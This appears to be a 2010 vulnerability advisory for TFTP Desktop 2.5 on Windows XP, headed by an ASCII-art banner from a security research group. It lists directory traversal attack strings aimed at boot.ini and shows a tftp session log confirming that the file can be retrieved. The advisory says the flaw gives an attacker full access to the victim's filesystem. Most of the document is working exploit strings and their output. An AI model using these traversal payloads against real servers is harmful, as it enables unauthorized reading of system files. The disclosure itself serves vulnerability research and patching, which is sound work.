+------------------------------------------------------------------------+ | ....... | | ..''xxxxxxxxxxxxxxx'... | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | | .xxxxxxxxxxxxxxxxxx'... ........ .'. | | 'xxxxxxxxxxxxxxx'...... '. | | 'xxxxxxxxxxxxxx'..'x.. .x. | | .xxxxxxxxxxxx'...'.. ... .' | | 'xxxxxxxxx'.. . .. .x. | | xxxxxxx'. .. x. | | xxxx'. .... x x. | | 'x'. ...'xxxxxxx'. x .x. | | .x'. .'xxxxxxxxxxxxxx. '' .' | | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | | .'xxxxxxx'.... ...xxxxxxx'. | | ..'xxxxx'.. ..xxxxx'.. | | ....'xx'.....''''... | | | | CubilFelino Security Research Labs | | proudly presents... | +------------------------------------------------------------------------+ Author: chr1x (chr1x@sectester.net) Date: August 30, 2010 Affected operating system/software, including full version details TFTP Desktop version 2.5, Tested on Windows XP PRO SP3 Download: http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe How the vulnerability can be reproduced Attack strings below: [*] Testing Path: .../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!! Confirmation log: root@olovely:/# tftp tftp> connect (to) tftp> ascii tftp> get (files) .../.../.../.../.../.../boot.ini Received 211 bytes in 0.0 seconds tftp> quit What impact the vulnerability has on the vulnerable system * High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.